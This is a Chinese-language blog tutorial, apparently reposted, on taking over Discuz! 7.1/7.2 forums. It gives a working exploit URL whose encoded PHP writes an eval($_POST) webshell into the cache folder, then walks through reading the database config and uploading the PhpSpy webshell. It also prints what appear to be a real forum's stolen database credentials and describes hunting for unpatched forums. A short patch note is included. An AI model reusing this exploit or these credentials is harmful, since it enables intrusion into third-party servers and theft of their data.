1. 程式人生 > >Discuz 7.2漏洞入侵圖解

Discuz 7.2漏洞入侵圖解

找到一個論壇,註冊一個賬號

註冊好後,使用exp

複製以下程式碼:

http://此處為論壇地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}

以上為exp

如若此處為空白,說明成功

存在該檔案

php一句話連線forumdata/cache/usergroup_01.php

讀取資料庫連線檔案

在模組中選擇讀取檔案,並輸入資料庫連線檔案的地址“****/dc/config.inc.php”,如圖8所示,成功獲取該論壇資料庫的敏感資訊:
$dbhost = 'localhost'; // 資料庫伺服器
$dbuser = 'skycheer'; // 資料庫使用者名稱
$dbpw = 'sky0127'; // 資料庫密碼
$dbname = 'skycheer'; // 資料庫名
$pconnect = 0;

上傳大馬

使用一句話管理實在是不方便,在功能模組中選擇上傳檔案,使用空的路徑直接將本地的大馬上傳到一句話木馬所在的路徑,上傳成功後直接訪問,如圖9所示,成功得到我們熟悉的PhpSpy ver 2008介面。至此已經獲取Discuz!7.2版本的Webshell,大家都知道Discuz!論壇的Webshell很難拿到,因此本漏洞的珍稀程度可想而知。

Discuz!7.1&7.2遠端溢位漏洞出來後,國內有關Discuz!的大中小論壇基本沒有什麼倖免,安全做的好的去掉了cache的執行許可權,將其許可權設定為無,逃過劫難。

友情提示:非法入侵他人站點,一切後果自負 上文出自77169 /techweb

利用:註冊後登陸 misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} 任意執行。

DZ 7.1、7.2 針對getshell的修復方法:
在common.inc.php上面加上$response=$scriptlang=array(); 

這個洞t00ls團隊發現的,DZ官方已經被人日過了。

官方補丁:

http://www.discuz.net/thread-1537673-1-1.html

=============================================================================

截止到今天有這個洞的Dz論壇已經很少了,我剛才在谷歌翻了幾篇,只找到一個有洞的,

其他的都補上了,可惜的是這個有洞的論壇用一句話連線後居然不顯示檔案路徑,真是杯具!